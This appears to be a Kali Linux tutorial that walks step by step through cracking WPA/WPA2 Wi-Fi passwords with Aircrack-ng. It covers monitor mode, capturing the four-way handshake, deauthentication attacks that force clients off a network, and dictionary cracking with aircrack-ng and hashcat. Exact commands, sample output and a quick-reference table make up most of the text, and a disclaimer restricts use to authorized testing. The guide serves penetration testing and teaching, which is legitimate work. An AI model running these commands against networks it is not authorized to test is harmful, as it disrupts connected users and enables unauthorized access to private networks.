Kali Linux

Cracking WPA/WPA2 with Aircrack-ng on Kali Linux

This guide covers testing WPA/WPA2 network security using the Aircrack-ng suite on Kali Linux. We'll capture the four-way handshake and perform dictionary attacks to recover the pre-shared key.

Legal Disclaimer: Only perform these techniques on networks you own or have explicit written permission to test. Unauthorized access to computer networks is illegal and can result in criminal prosecution. This guide is for educational and authorized penetration testing purposes only.

How WPA/WPA2 Cracking Works

WPA/WPA2 uses a robust encryption scheme that cannot be broken through statistical analysis like WEP. The only viable attack is:

  1. Capture the four-way handshake between a client and access point
  2. Perform a dictionary attack comparing password hashes against a wordlist

The handshake occurs when a client connects to the network. If no clients are actively connecting, we can force a reconnection by sending deauthentication frames.

Key limitation: This attack only succeeds if the password exists in your wordlist.

Note: This technique does not work against WPA3, which uses Simultaneous Authentication of Equals (SAE) and is immune to offline dictionary attacks.

Prerequisites

Hardware Requirements

You need a wireless adapter that supports:

  • Monitor mode - Passive packet capture
  • Packet injection - Sending raw 802.11 frames

Recommended adapters:

  • Alfa AWUS036ACH (dual-band, 802.11ac)
  • Alfa AWUS036ACHM (dual-band, newer chipset)
  • Alfa AWUS1900 (high power, quad-antenna)
  • TP-Link TL-WN722N v1 (budget option, Atheros chipset)

Note: Many built-in laptop wireless cards don't support monitor mode or injection. Check the Aircrack-ng compatibility list for your chipset.

Software Requirements

Kali Linux comes with Aircrack-ng pre-installed. Verify with:

aircrack-ng --version

The suite includes 20+ tools. The ones we'll use:

Tool Purpose
airmon-ng Enable/disable monitor mode
airodump-ng Capture wireless packets
aireplay-ng Inject packets (deauthentication)
aircrack-ng Crack captured handshakes

Wordlist

Kali includes the famous rockyou.txt wordlist:

# Decompress if needed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Check it exists
ls -lh /usr/share/wordlists/rockyou.txt

This contains ~14 million passwords (134MB uncompressed).

Step 1: Identify Your Wireless Interface

List your network interfaces:

iwconfig

Look for your wireless adapter (typically wlan0 or wlan1):

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated
          ...

Note the interface name—we'll use wlan0 throughout this guide.

Step 2: Kill Interfering Processes

Network managers can interfere with monitor mode by changing channels or resetting the interface. Kill them first:

sudo airmon-ng check kill

This stops processes like:

  • NetworkManager
  • wpa_supplicant
  • dhclient

You'll see output like:

Killing these processes:

  PID Name
  723 wpa_supplicant
  812 NetworkManager

Note: Your regular network connection will stop working. To restore it later:

sudo systemctl start NetworkManager

Step 3: Enable Monitor Mode

Put your wireless adapter into monitor mode:

sudo airmon-ng start wlan0

Output:

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros AR9271

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now wlan0mon (monitor mode). Verify with:

iwconfig wlan0mon

You should see Mode:Monitor.

Step 4: Scan for Target Networks

Start scanning for nearby wireless networks:

sudo airodump-ng wlan0mon

You'll see a live display:

 CH  9 ][ Elapsed: 1 min ][ 2026-01-09 15:30

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:14:6C:7E:40:80  -67      234      1245   12   6   54e  WPA2 CCMP   PSK  HomeNetwork
 A0:B1:C2:D3:E4:F5  -72       89       456    3  11   54e  WPA2 CCMP   PSK  CoffeeShop

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2  -45    54e-54      0      892
 00:14:6C:7E:40:80  48:A9:1C:3D:2E:8F  -52    54e-54      0      234

Top section: Access points
Bottom section: Connected clients

Note down for your target:

  • BSSID: 00:14:6C:7E:40:80 (AP's MAC address)
  • CH: 6 (channel)
  • ESSID: HomeNetwork (network name)
  • Client MAC: 00:0F:B5:FD:FB:C2 (for targeted deauth)

Press Ctrl+C to stop scanning.

Step 5: Capture the Handshake

Focus on your target network and start capturing:

sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w capture wlan0mon

Parameters:

  • -c 6 — Lock to channel 6
  • --bssid 00:14:6C:7E:40:80 — Filter by target AP
  • -w capture — Output file prefix
  • wlan0mon — Monitor interface

Leave this running in the terminal. It will create files like capture-01.cap.

Step 6: Force a Handshake (Deauthentication)

Open a new terminal and send deauthentication frames to force clients to reconnect:

Option A: Deauth All Clients (Broadcast)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 wlan0mon

Option B: Deauth Specific Client (More Reliable)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

Parameters:

  • -0 5 — Deauthentication mode, send 5 packets
  • -a — Target AP's BSSID
  • -c — Target client's MAC (optional but more effective)

Output:

15:32:45  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 6
15:32:45  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
15:32:46  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
...

Verify Handshake Capture

Watch your airodump-ng window. When a handshake is captured, you'll see:

 CH  6 ][ Elapsed: 2 mins ][ 2026-01-09 15:34 ][ WPA handshake: 00:14:6C:7E:40:80

The WPA handshake: [BSSID] message confirms success. You can now stop airodump-ng with Ctrl+C.

Step 7: Crack the Password

Use aircrack-ng with your wordlist:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap

Parameters:

  • -w — Path to wordlist
  • -b — Target BSSID
  • Last argument — Capture file

Successful Output

                               Aircrack-ng 1.7

      [00:05:23] 1823741/14344392 keys tested (5765.32 k/s)

      Time left: 36 minutes, 12 seconds                      12.71%

                          KEY FOUND! [ SuperSecret123 ]

      Master Key     : A1 B2 C3 D4 E5 F6 77 88 99 AA BB CC DD EE FF 00
                       11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00

      Transient Key  : 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
                       ...

      EAPOL HMAC     : AB CD EF 01 23 45 67 89 AB CD EF 01 23 45 67 89

The password is SuperSecret123.

Failed Attempt

If the password isn't in your wordlist:

                               Aircrack-ng 1.7

      [00:42:17] 14344392/14344392 keys tested (5612.43 k/s)

      Time left: 0 seconds                                  100.00%

      KEY NOT FOUND

      Passphrase not in dictionary

Try a different or larger wordlist, or use hashcat for GPU-accelerated cracking.

Step 8: GPU-Accelerated Cracking with Hashcat

For faster cracking, convert the capture and use hashcat:

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (GPU-accelerated)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Performance comparison:

  • Aircrack-ng (CPU): ~5,000 keys/second
  • Hashcat (GPU): ~400,000+ keys/second

Step 9: Restore Normal Networking

When you're done, disable monitor mode and restore network services:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart network manager
sudo systemctl start NetworkManager

Quick Reference

Step Command
Kill interfering processes sudo airmon-ng check kill
Enable monitor mode sudo airmon-ng start wlan0
Scan networks sudo airodump-ng wlan0mon
Capture handshake sudo airodump-ng -c [CH] --bssid [MAC] -w capture wlan0mon
Deauthenticate clients sudo aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon
Crack password sudo aircrack-ng -w wordlist.txt capture-01.cap
Disable monitor mode sudo airmon-ng stop wlan0mon
Restore networking sudo systemctl start NetworkManager

Troubleshooting

"No handshake captured"

  • Ensure clients are connected to the target network
  • Get physically closer to the AP and clients
  • Try deauthenticating specific clients instead of broadcast
  • Verify you're on the correct channel
  • Some clients may not reconnect automatically—be patient

"Interface doesn't support monitor mode"

  • Check if your adapter is compatible
  • Try updating drivers: sudo apt update && sudo apt upgrade
  • Consider purchasing a compatible USB adapter

"Passphrase not in dictionary"

  • Try larger wordlists:
  • Use rule-based attacks with hashcat
  • Create custom wordlists based on target information

"Channel hopping" or unstable capture

  • Make sure you killed all interfering processes
  • Verify NetworkManager and wpa_supplicant are stopped
  • Lock to the target channel with -c

Additional Resources

For more advanced techniques:

# View all aircrack-ng tools
dpkg -L aircrack-ng | grep /usr/bin/

# Get help for any tool
airodump-ng --help
aireplay-ng --help

References

Official Documentation:

Wordlists:

Read next